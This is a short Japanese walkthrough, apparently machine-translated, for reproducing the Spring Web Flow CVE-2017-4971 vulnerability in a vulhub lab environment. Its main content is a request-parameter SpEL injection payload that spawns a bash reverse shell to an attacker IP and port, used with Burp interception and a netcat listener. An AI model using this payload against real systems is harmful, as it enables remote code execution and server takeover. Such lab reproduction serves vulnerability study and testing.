1. 環境をセットアップします
cd vulhub/spring/CVE-2017-4971
docker-compose up -d
影響を受けるバージョン: Spring Web Flow 2.4.0 ~ 2.4.4
トリガー条件: 1.
MvcViewFactoryCreator オブジェクトの useSpringBeanBinding パラメータを false (デフォルト値) に設定する必要がある
2. フロー ビュー オブジェクトの BinderConfiguration オブジェクトが空に設定されている
2 . 脆弱性の再発
1. ログイン
以下のリンクをクリックし、左側のデフォルトのアカウントを使用してログインします
http://192.168.25.128:8080/login
ログイン後
「続行」をクリックします
2. パケットのキャプチャ
: げっぷパケットのキャプチャ、インターセプトを有効にし、同時に確認をクリックします。
3.NCが監視を開始します
4. パッケージデータを変更します
&_(new+java.lang.ProcessBuilder("bash","-c","bash±i+>%26+/dev/tcp/192.168.155.2/1122+0>%261")) .start()=vulhub は
csrf の背後で接続します。IP とポートを自分の攻撃マシンのものに変更することを忘れないでください。
5. リバウンドシェル
302 が表示された場合はリダイレクトを意味するので、もう一度試してください。